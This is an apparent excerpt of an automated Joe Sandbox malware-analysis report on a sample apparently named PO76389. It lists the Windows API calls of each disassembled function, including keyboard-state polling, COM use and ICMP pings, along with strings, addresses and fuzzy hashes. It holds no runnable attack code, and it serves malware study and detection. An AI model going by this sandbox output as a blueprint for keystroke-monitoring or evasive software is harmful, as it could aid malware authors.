                                                    • Instruction ID: 8d964334dc49b26038b8e4b356881d5f883f09bd2c2a1d87b6f70490f31f3736
                                                    • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                    • Instruction Fuzzy Hash: 5E71F771A01B16ABD714AF6ACC51B6BB3A9AF00725F14422FF514D7781EF78DE008B98
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5816
                                                    • GetMenuItemInfoW.USER32(005718F0,000000FF,00000000,00000030), ref: 004F5877
                                                    • SetMenuItemInfoW.USER32(005718F0,00000004,00000000,00000030), ref: 004F58AD
                                                    • Sleep.KERNEL32(000001F4), ref: 004F58BF
                                                    • GetMenuItemCount.USER32(?), ref: 004F5903
                                                    • GetMenuItemID.USER32(?,00000000), ref: 004F591F
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 004F5949
                                                    • GetMenuItemID.USER32(?,?), ref: 004F598E
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004F59D4
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F59E8
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5A09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: 9a36cf87d73cc3895ed88b4f037b397a2cbd7ef943b4649d9e595b21ca2ef2b1
                                                    • Instruction ID: 7bf4fdf52f2cd79fe68ca1e13faf41f55f72e5e153ec0ef69dcdeb245ed3372d
                                                    • Opcode Fuzzy Hash: 9a36cf87d73cc3895ed88b4f037b397a2cbd7ef943b4649d9e595b21ca2ef2b1
                                                    • Instruction Fuzzy Hash: D361CBB0900A4DEFDB15DFA8E888EBF7BB8EB01358F14011AE741A3251D378AD05DB25
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00519AA5
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00519AA8
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00519ACC
                                                    • _memset.LIBCMT ref: 00519ADD
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00519AEF
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00519B67
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: ad8e83c5b32cd65567fcb7bc9ccdec98200bc6394dcbb1c44f9c194949b115c8
                                                    • Instruction ID: eb5e0bc2654097eb24a2463f80d9a5246f4f946d508486f2198cb6e92fe75f1a
                                                    • Opcode Fuzzy Hash: ad8e83c5b32cd65567fcb7bc9ccdec98200bc6394dcbb1c44f9c194949b115c8
                                                    • Instruction Fuzzy Hash: AE618B75900208AFEB10DFA8DC91EEE7BF8BF09304F144159FA19A7291C770AD85DBA4
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 004F3591
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 004F3612
                                                    • GetKeyState.USER32(000000A0), ref: 004F362D
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004F3647
                                                    • GetKeyState.USER32(000000A1), ref: 004F365C
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004F3674
                                                    • GetKeyState.USER32(00000011), ref: 004F3686
                                                    • GetAsyncKeyState.USER32(00000012), ref: 004F369E
                                                    • GetKeyState.USER32(00000012), ref: 004F36B0
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 004F36C8
                                                    • GetKeyState.USER32(0000005B), ref: 004F36DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                    • Instruction ID: 59d00228232c2e2f2dcd307098812ff5ae44e0636184fd5d87f519caba71cf81
                                                    • Opcode Fuzzy Hash: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                    • Instruction Fuzzy Hash: 114172705047CD7DFF315E6494143B7BAB06B2134AF04405BD7C6863C2EBA89BC8876A
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004EA2AA
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 004EA2F5
                                                    • VariantInit.OLEAUT32(?), ref: 004EA307
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004EA327
                                                    • VariantCopy.OLEAUT32(?,?), ref: 004EA36A
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004EA37E
                                                    • VariantClear.OLEAUT32(?), ref: 004EA393
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 004EA3A0
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3A9
                                                    • VariantClear.OLEAUT32(?), ref: 004EA3BB
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: e392a756841232aa922de6cc76512cf177062d30b3611fcdc7179dd3b470d8c2
                                                    • Instruction ID: c0ff3831ecb9ce5648a64b3ad897cc25d35aaf8027218990980fdac2ebe2ea60
                                                    • Opcode Fuzzy Hash: e392a756841232aa922de6cc76512cf177062d30b3611fcdc7179dd3b470d8c2
                                                    • Instruction Fuzzy Hash: AF414D31900219AFCF01DFA5D8849DEBFB9FF08345F00806AF901A7251DB74AA59DBA5
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • CoInitialize.OLE32 ref: 0050B298
                                                    • CoUninitialize.COMBASE ref: 0050B2A3
                                                    • CoCreateInstance.COMBASE(?,00000000,00000017,0053D8FC,?), ref: 0050B303
                                                    • IIDFromString.COMBASE(?,?), ref: 0050B376
                                                    • VariantInit.OLEAUT32(?), ref: 0050B410
                                                    • VariantClear.OLEAUT32(?), ref: 0050B471
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                    • Instruction ID: 18f173c7f03f3a59dbc1f0b468f76d1648b878fa85cd033332fe6913687def26
                                                    • Opcode Fuzzy Hash: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                    • Instruction Fuzzy Hash: 5F61AC70204701AFE710DF55C889BAEBBE8BF88714F14481EF9859B291D770EE48CB96
                                                    APIs
                                                    • WSAStartup.WS2_32(00000101,?), ref: 005086F5
                                                    • inet_addr.WS2_32(?), ref: 0050873A
                                                    • gethostbyname.WS2_32(?), ref: 00508746
                                                    • IcmpCreateFile.IPHLPAPI ref: 00508754
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005087C4
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005087DA
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0050884F
                                                    • WSACleanup.WS2_32 ref: 00508855
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: b915ce4df16005a1794cd2b03e87eaa1c45ef7a88cc689ec55800e2190deed76
                                                    • Instruction ID: 7d24e70ee4017e02bd9e15171cab4f62010fa913f751978bea9de60354c44b23
                                                    • Opcode Fuzzy Hash: b915ce4df16005a1794cd2b03e87eaa1c45ef7a88cc689ec55800e2190deed76
                                                    • Instruction Fuzzy Hash: B151AE31604201AFDB10AF25CC85F6EBBE4FF48724F04882AF9969B2E1DB74E804DB51
                                                    APIs
                                                    • _memset.LIBCMT ref: 00519C68
                                                    • CreateMenu.USER32 ref: 00519C83
                                                    • SetMenu.USER32(?,00000000), ref: 00519C92
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00519D1F
                                                    • IsMenu.USER32(?), ref: 00519D35
                                                    • CreatePopupMenu.USER32 ref: 00519D3F
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00519D70
                                                    • DrawMenuBar.USER32 ref: 00519D7E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0
                                                    • API String ID: 176399719-4108050209
                                                    • Opcode ID: 7dda052996b7e94b4a6849d8ce6a78f7a4bb99abc73972705e0e47b969186c1a
                                                    • Instruction ID: d4c10c150bfe60b1a598474a3696364084720cf4c6dabf8c317e812975d3d155
                                                    • Opcode Fuzzy Hash: 7dda052996b7e94b4a6849d8ce6a78f7a4bb99abc73972705e0e47b969186c1a
                                                    • Instruction Fuzzy Hash: 18416A75A00209EFEB10EF68E894BDABBF5FF49344F140029E945A7351D730A954EF60
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FEC1E
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004FEC94
                                                    • GetLastError.KERNEL32 ref: 004FEC9E
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 004FED0B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 398ba347ec7bb1d7c614a92cf16d5a8e9ad0b5f6ed27bd45b2c8bf3be269e0f6
                                                    • Instruction ID: 07ded8a3dd63178c0a63ec8b03525226bf2a069b54b16d75e292f749b04d3571
                                                    • Opcode Fuzzy Hash: 398ba347ec7bb1d7c614a92cf16d5a8e9ad0b5f6ed27bd45b2c8bf3be269e0f6
                                                    • Instruction Fuzzy Hash: 7331E135A002499FC700EF66C845ABABBB4FF44701F10402BF601D73A1DA799D42DB95
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004EC782
                                                    • GetDlgCtrlID.USER32 ref: 004EC78D
                                                    • GetParent.USER32 ref: 004EC7A9
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC7AC
                                                    • GetDlgCtrlID.USER32(?), ref: 004EC7B5
                                                    • GetParent.USER32(?), ref: 004EC7D1
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC7D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 313823418-1403004172
                                                    • Opcode ID: ea300f14d533173d55a9471da424980e5953d83e4ba77b4597ac4f7a983aaa9e
                                                    • Instruction ID: ca8cf07a9b074c4ead5b658a51dd7b49c64bd799e826e5ae5c104476c19df93d
                                                    • Opcode Fuzzy Hash: ea300f14d533173d55a9471da424980e5953d83e4ba77b4597ac4f7a983aaa9e
                                                    • Instruction Fuzzy Hash: BA21B074900209AFCF04ABA5CCC6EFEBB75EB55301F10011AF562932D1DBB9581AEB24
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004EC869
                                                    • GetDlgCtrlID.USER32 ref: 004EC874
                                                    • GetParent.USER32 ref: 004EC890
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC893
                                                    • GetDlgCtrlID.USER32(?), ref: 004EC89C
                                                    • GetParent.USER32(?), ref: 004EC8B8
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC8BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 313823418-1403004172
                                                    • Opcode ID: 96e8009b9c241a463c9951a5502659b020eb4d6519494c6f8aedc82e55a192d0
                                                    • Instruction ID: be086e8fea26c45e8229d30b0eda16cab9b11a507861ab1add5603f9a1bb2a4f
                                                    • Opcode Fuzzy Hash: 96e8009b9c241a463c9951a5502659b020eb4d6519494c6f8aedc82e55a192d0
                                                    • Instruction Fuzzy Hash: 1421A171900208ABDF04ABA6CCC6EFEBB75EB55301F100056F551A3291DBB9581AAB24
                                                    APIs
                                                    • GetParent.USER32 ref: 004EC8D9
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 004EC8EE
                                                    • _wcscmp.LIBCMT ref: 004EC900
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004EC97B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: ec48a76ddadd25e3dd186eea87036d3296dd506521610ea3416df76186fe436f
                                                    • Instruction ID: fbf24216ad5191ff708643d250120eb16bfde321beb3ed8ab13f4b4099dd6a73
                                                    • Opcode Fuzzy Hash: ec48a76ddadd25e3dd186eea87036d3296dd506521610ea3416df76186fe436f
                                                    • Instruction Fuzzy Hash: 55113AB7248782B9FA042A32EC47CA77BACDF12324B200017F910A61E3FB6968034568
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0050B777
                                                    • CoInitialize.OLE32(00000000), ref: 0050B7A4
                                                    • CoUninitialize.COMBASE ref: 0050B7AE
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0050B8AE
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0050B9DB
                                                    • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0050BA0F
                                                    • CoGetObject.OLE32(?,00000000,0053D91C,?), ref: 0050BA32
                                                    • SetErrorMode.KERNEL32(00000000), ref: 0050BA45
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0050BAC5
                                                    • VariantClear.OLEAUT32(0053D91C), ref: 0050BAD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: 4e7e28130ef20f85ebc024fc10cf474bd04de71161ab0475c634d58c0143b421
                                                    • Instruction ID: e06cb881069376ca385fdc696ae478b3c33a74e76331130f1e15b96e3ecc304b
                                                    • Opcode Fuzzy Hash: 4e7e28130ef20f85ebc024fc10cf474bd04de71161ab0475c634d58c0143b421
                                                    • Instruction Fuzzy Hash: ACC10371604305AFD700DF69C884A6ABBF9FF88348F04495DF98A9B291DB71ED05CB62
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004FB137
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: 32ed3f6c74122d3b03088169c2b4c40ad233e1272bca75a89846e3e2d72e0231
                                                    • Instruction ID: 57cd0b816b5e0bc12e5ba722ddc3879b39282fb8c90e61c8b38e82fc502ad7f5
                                                    • Opcode Fuzzy Hash: 32ed3f6c74122d3b03088169c2b4c40ad233e1272bca75a89846e3e2d72e0231
                                                    • Instruction Fuzzy Hash: 2CC18C75A0021ADFDB00CF98D485BBEB7B4EF0A315F24406BEA05E7341C778A945CB99
                                                    APIs
                                                    • __lock.LIBCMT ref: 004DBA74
                                                      • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                      • Part of subcall function 004D8984: RtlEnterCriticalSection.NTDLL(004D0127), ref: 004D89AF
